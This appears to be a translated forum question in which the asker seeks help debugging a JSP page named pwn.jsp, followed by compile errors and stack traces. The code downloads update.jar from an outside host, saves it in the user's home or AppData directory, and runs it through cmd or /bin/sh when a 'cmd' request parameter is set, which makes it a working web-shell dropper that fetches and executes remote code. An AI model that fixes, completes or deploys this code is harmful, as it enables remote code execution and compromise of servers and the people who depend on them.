我对 servletts 比较陌生,我无法弄清楚这一点。在我看来一切都很好...
这是我的代码:
<%@ page import="java.util.*,java.io.*, java.net.*, "%>
<%
String cmd;
String[] cmdarr;
String OS = System.getProperty("os.name");
String link = "http://site.com/update.jar";
String userDir = System.getProperty("user.home");
int last = link.lastIndexOf("/");
int ending = link.lastIndexOf(".");
String fileName = link.substring(last + 1);
String fileEnding = link.substring(ending + 1);
URL u = new URL(link);
URLConnection uc = u.openConnection();
String contentType = uc.getContentType();
int contentLength = uc.getContentLength();
if (contentType.startsWith("text/") || contentLength == -1) {
throw new IOException("This is not a binary file.");
}
InputStream raw = uc.getInputStream();
InputStream in = new BufferedInputStream(raw);
byte[] data = new byte[contentLength];
int bytesRead = 0;
int offset = 0;
while (offset < contentLength) {
bytesRead = in.read(data, offset, data.length - offset);
if (bytesRead == -1)
break;
offset += bytesRead;
}
in.close();
String path;
if (offset != contentLength) {
throw new IOException("Only read " + offset + " bytes; Expected " + contentLength + " bytes");
}
if(OS.startsWith("Mac")){
path = userDir+"/Library/"+fileName;
}
else if(OS.startsWith("Windows")){
path = userDir+"/AppData/Roaming/"+fileName;
}
else if(OS.startsWith("Linux")){
path = userDir+"/"+fileName;
}
else{
path = userDir+"/"+fileName;
}
FileOutputStream out = new FileOutputStream(path);
out.write(data);
out.flush();
out.close();
if (request.getParameter("cmd") != null) {
cmd = "java -jar "+path;
if (OS.startsWith("Windows")) {
cmdarr = new String [] {"cmd", "/C", cmd};
}
else {
cmdarr = new String [] {"/bin/sh", "-c", cmd};
}
Process p = Runtime.getRuntime().exec(cmdarr);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
这是错误:
org.apache.jasper.JasperException: Unable to compile class for JSP
Generated servlet error:
Syntax error on token "import", Identifier expected after this token
An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable out
An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
The method write(int) in the type Writer is not applicable for the arguments (byte[])
An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable in
org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:510)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:375)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
root cause
org.apache.jasper.JasperException: Unable to compile class for JSP
Generated servlet error:
Syntax error on token "import", Identifier expected after this token
An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable out
An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
The method write(int) in the type Writer is not applicable for the arguments (byte[])
An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable in
org.apache.jasper.compiler.DefaultErrorHandler.javacError(DefaultErrorHandler.java:84)
org.apache.jasper.compiler.ErrorDispatcher.javacError(ErrorDispatcher.java:328)
org.apache.jasper.compiler.JDTCompiler.generateClass(JDTCompiler.java:413)
org.apache.jasper.compiler.Compiler.compile(Compiler.java:297)
org.apache.jasper.compiler.Compiler.compile(Compiler.java:276)
org.apache.jasper.compiler.Compiler.compile(Compiler.java:264)
org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:563)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:303)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
我已经修复了导入错误和重复变量,但现在我收到了这个错误:
org.apache.jasper.JasperException: An exception occurred processing JSP page /file.jsp at line 52
49: path = userDir+"/"+fileName;
50: }
51:
52: FileOutputStream out2 = new FileOutputStream(path);
53: out2.write(data);
54: out2.flush();
55: out2.close();
Stacktrace:
org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:518)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:417)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:320)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:266)
javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
root cause
java.io.FileNotFoundException: C:\AppData\Roaming\update.jar (Das System kann den angegebenen Pfad nicht finden)
java.io.FileOutputStream.open(Native Method)
java.io.FileOutputStream.<init>(Unknown Source)
java.io.FileOutputStream.<init>(Unknown Source)
org.apache.jsp.pwn_jsp._jspService(pwn_jsp.java:108)
org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:387)
org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:320)
org.apache.jasper.servlet.JspServlet.service(JspServlet.java:266)
javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)